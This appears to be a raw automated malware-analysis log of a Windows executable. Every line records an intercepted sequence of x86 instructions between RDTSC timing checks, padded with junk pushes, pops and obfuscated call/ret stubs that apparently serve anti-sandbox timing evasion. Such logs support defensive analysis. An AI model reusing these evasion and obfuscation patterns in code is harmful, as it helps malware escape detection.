Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDAE52 second address: CDAE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDAE58 second address: CDAE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDB4E6 second address: CDB503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDB503 second address: CDB508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDB508 second address: CDB51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jne 00007FCBA141C926h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDBEE8 second address: CDBFA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FCBA141FCACh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FCBA141FCB2h 0x00000016 nop 0x00000017 mov esi, ebx 0x00000019 jmp 00007FCBA141FCB7h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FCBA141FCA8h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a sub dword ptr [ebp+122D1B7Ah], edi 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FCBA141FCA8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c pushad 0x0000005d mov si, 9614h 0x00000061 mov eax, esi 0x00000063 popad 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 jmp 00007FCBA141FCB5h 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDBDC0 second address: CDBDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDBDC5 second address: CDBDCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDD15F second address: CDD169 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA141C926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDDB52 second address: CDDB56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDDB56 second address: CDDB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a add di, 9071h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 or esi, dword ptr [ebp+122D26B4h] 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jnl 00007FCBA141C928h 0x00000021 jl 00007FCBA141C928h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e jnp 00007FCBA141C926h 0x00000034 pop esi 0x00000035 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDE5B5 second address: CDE5C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA141FCA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDE5C7 second address: CDE5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCBA141C926h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDF019 second address: CDF03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007FCBA141FCA8h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FCBA141FCB1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDF03D second address: CDF043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CDF043 second address: CDF047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE0638 second address: CE063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE3CBC second address: CE3CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE041E second address: CE0422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE4D3D second address: CE4D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE5C5C second address: CE5C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE7A8D second address: CE7A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE7A91 second address: CE7A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE8AA4 second address: CE8B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA141FCAFh 0x0000000f nop 0x00000010 movsx ebx, si 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FCBA141FCA8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f adc edi, 4B971600h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007FCBA141FCA8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 sub di, CDCBh 0x00000056 push eax 0x00000057 jp 00007FCBA141FCC9h 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FCBA141FCB7h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CE5DCC second address: CE5DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FCBA141C926h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FCBA141C92Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEAC29 second address: CEAC33 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEAC33 second address: CEAC3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEAC3A second address: CEAC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FCBA141FCB0h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEAC4D second address: CEACB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 sbb di, 5912h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FCBA141C928h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D242Dh], ebx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FCBA141C928h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FCBA141C931h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEBC7F second address: CEBC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEBC83 second address: CEBC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEBC89 second address: CEBD2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FCBA141FCA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FCBA141FCA8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push eax 0x00000028 mov bx, 5107h 0x0000002c pop edi 0x0000002d call 00007FCBA141FCB5h 0x00000032 jno 00007FCBA141FCACh 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007FCBA141FCA8h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 push 00000000h 0x00000057 sub bl, FFFFFFE1h 0x0000005a xchg eax, esi 0x0000005b jmp 00007FCBA141FCB8h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FCBA141FCA6h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CEBD2A second address: CEBD30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CECC3B second address: CECCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FCBA141FCB2h 0x0000000b nop 0x0000000c add dword ptr [ebp+1244CE7Eh], esi 0x00000012 movsx edi, ax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FCBA141FCA8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 sub ebx, dword ptr [ebp+122D2BA0h] 0x00000037 push 00000000h 0x00000039 mov edi, ecx 0x0000003b xchg eax, esi 0x0000003c jmp 00007FCBA141FCB9h 0x00000041 push eax 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 ja 00007FCBA141FCA6h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEECD1 second address: CEED3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FCBA141C92Dh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FCBA141C928h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 sbb bh, 00000061h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FCBA141C928h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000000h 0x00000047 mov ebx, dword ptr [ebp+122D2A7Ch] 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 pop eax 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEED3C second address: CEED40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEED40 second address: CEED44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEDE34 second address: CEDE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CECECB second address: CECECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBE4C second address: CEBEEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FCBA141FCA8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FCBA141FCA8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 and edi, dword ptr [ebp+122D2EE6h] 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov edi, dword ptr [ebp+122D2990h] 0x0000005a mov eax, dword ptr [ebp+122D10ADh] 0x00000060 mov edi, dword ptr [ebp+122D2E18h] 0x00000066 push FFFFFFFFh 0x00000068 mov bl, D4h 0x0000006a nop 0x0000006b jmp 00007FCBA141FCB8h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 jnp 00007FCBA141FCA6h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CECECF second address: CECED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBEEA second address: CEBEF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEDEE6 second address: CEDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEEFE0 second address: CEEFE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEFD20 second address: CEFD24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEEFE6 second address: CEEFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF0E02 second address: CF0E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FCBA141C928h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF2046 second address: CF204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF2151 second address: CF2156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF2156 second address: CF215B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB26E second address: CFB274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB274 second address: CFB27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB27A second address: CFB27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB4E4 second address: CFB4EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCBA141FCA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB4EF second address: CFB4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D05D21 second address: D05D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCBA141FCA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D063EE second address: D06412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCBA141C938h 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06AFD second address: D06B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06DAB second address: D06DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FCBA141C926h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06DB7 second address: D06DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBA141FCAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jne 00007FCBA141FCA6h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FCBA141FCB4h 0x0000001d jmp 00007FCBA141FCB2h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06DFB second address: D06E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06E11 second address: D06E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C92BE8 second address: C92BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B2A3 second address: D0B2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCBA141FCB8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B2C2 second address: D0B2C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B2C8 second address: D0B2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B410 second address: D0B424 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA141C926h 0x00000008 jo 00007FCBA141C926h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B5AD second address: D0B5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B5B8 second address: D0B5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jno 00007FCBA141C92Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B8D8 second address: D0B8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B8DC second address: D0B8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBA141C926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BA6A second address: D0BA6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BA6F second address: D0BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BD16 second address: D0BD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCBA141FCB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BD31 second address: D0BD36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BD36 second address: D0BD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BFEE second address: D0BFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BFF4 second address: D0BFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
